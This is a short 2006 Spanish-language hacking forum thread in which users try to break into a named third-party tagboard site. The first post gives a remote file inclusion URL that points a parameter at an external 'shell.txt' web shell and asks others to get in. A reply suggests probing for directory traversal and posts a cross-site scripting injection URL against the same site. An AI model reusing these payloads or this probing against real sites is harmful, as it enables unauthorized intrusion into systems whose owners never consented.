Text only | Text with Images

HackPR.NET

Hacking y Seguridad => HacK General / Ethical Hacking => Topic started by: KX-T33 on December 12, 2006, 06:09:01 PM

Title: A ver si ustedes pueden...
Post by: KX-T33 on December 12, 2006, 06:09:01 PM
http://jordi17.webcindario.com/mc60/ftag.php?mostrar=www.kxteam.org/shell.txt?

Esos MC de Naveda.. tienen vulnerabilidad al RFI Pues... pero trato trato y no se como metermele.. quien lo haga por favor ponga aqui la Web... XDD para meterle!
Title: Re: A ver si ustedes pueden...
Post by: freak on December 12, 2006, 07:14:58 PM
Quote from: KX-T33 on December 12, 2006, 06:09:01 PM
http://jordi17.webcindario.com/mc60/ftag.php?mostrar=www.kxteam.org/shell.txt?

Esos MC de Naveda.. tienen vulnerabilidad al RFI Pues... pero trato trato y no se como metermele.. quien lo haga por favor ponga aqui la Web... XDD para meterle!

http://jordi17.webcindario.com/mc60/ftag.php?mostrar=x

me parece ke no es vulnerable .. sino lo ke podes hacer es bajarte el code del tagboard y fijarte si tiene rfi .. es lo mejor ke te puedo recomendar .. me parece ke lo ke te dice es un error ..asi como ke la variable tiene un error o no existe ;)

http://jordi17.webcindario.com/mc60/ftag.php?include_path=www.google.com.ar

mira lo ke te dice el amigo google. .. lee y fijate si le encontras un directorio transversal ;)
Title: Re: A ver si ustedes pueden...
Post by: freak on December 12, 2006, 07:28:35 PM
sino buscale xss

http://jordi17.webcindario.com/mc60/ftag.php?mostrar=<h1>FREAK%20SE%20DIO%20POR%20VENCIDO%20xD
Text only | Text with Images